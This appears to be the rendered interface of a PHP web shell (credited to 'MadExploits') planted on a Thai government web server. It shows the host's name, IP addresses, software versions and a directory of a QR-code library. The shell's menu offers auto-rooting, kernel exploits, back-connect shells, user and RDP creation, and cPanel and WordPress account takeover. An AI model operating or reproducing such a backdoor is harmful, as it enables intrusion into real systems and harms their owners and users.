Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
include /
php_qrcode /
[ HOME SHELL ]
Name
Size
Permission
Action
bindings
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
temp
[ DIR ]
drwxrwxrwx
tools
[ DIR ]
drwxr-xr-x
CHANGELOG
1.23
KB
-rw-r--r--
INSTALL
1.99
KB
-rw-r--r--
LICENSE
7.63
KB
-rw-r--r--
README
1.6
KB
-rw-r--r--
VERSION
17
B
-rw-r--r--
d022562.upd
313.98
KB
-rw-r--r--
index.php
3.85
KB
-rw-r--r--
index_asset.php
3.85
KB
-rw-r--r--
phpqrcode.php
118.93
KB
-rw-r--r--
qrbitstream.php
5.26
KB
-rw-r--r--
qrconfig.php
1.41
KB
-rw-r--r--
qrconst.php
1.72
KB
-rw-r--r--
qrencode.php
17.1
KB
-rw-r--r--
qrimage.php
3.54
KB
-rw-r--r--
qrinput.php
24.22
KB
-rw-r--r--
qrlib.php
1.56
KB
-rw-r--r--
qrmask.php
12.29
KB
-rw-r--r--
qrrscode.php
8.29
KB
-rw-r--r--
qrspec.php
25.99
KB
-rw-r--r--
qrsplit.php
11.11
KB
-rw-r--r--
qrtools.php
6.18
KB
-rw-r--r--
ÍèÒ¹·Õè¹Õè¡è͹.txt
568
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL
== REQUIREMENTS == * PHP5 * PHP GD2 extension with JPEG and PNG support == INSTALLATION == If you want to recreate cache by yourself make sure cache directory is writable and you have permisions to write into it. Also make sure you are able to read files in it if you have cache option enabled == CONFIGURATION == Feel free to modify config constants in qrconfig.php file. Read about it in provided comments and project wiki page (links in README file) == QUICK START == Notice: probably you should'nt use all of this in same script :) <?phpb //include only that one, rest required files will be included from it include "qrlib.php" //write code into file, Error corection lecer is lowest, L (one form: L,M,Q,H) //each code square will be 4x4 pixels (4x zoom) //code will have 2 code squares white boundary around QRcode::png('PHP QR Code :)', 'test.png', 'L', 4, 2); //same as above but outputs file directly into browser (with appr. header etc.) //all other settings are default //WARNING! it should be FIRST and ONLY output generated by script, otherwise //rest of output will land inside PNG binary, breaking it for sure QRcode::png('PHP QR Code :)'); //show benchmark QRtools::timeBenchmark(); //rebuild cache QRtools::buildCache(); //code generated in text mode - as a binary table //then displayed out as HTML using Unicode block building chars :) $tab = $qr->encode('PHP QR Code :)'); QRspec::debug($tab, true); == TCPDF INTEGRATION == Inside bindings/tcpdf you will find slightly modified 2dbarcodes.php. Instal phpqrcode liblaty inside tcpdf folder, then overwrite (or merge) 2dbarcodes.php Then use similar as example #50 from TCPDF examples: <?php $style = array( 'border' => true, 'padding' => 4, 'fgcolor' => array(0,0,0), 'bgcolor' => false, //array(255,255,255) ); //code name: QR, specify error correction level after semicolon (L,M,Q,H) $pdf->write2DBarcode('PHP QR Code :)', 'QR,L', '', '', 30, 30, $style, 'N');
Close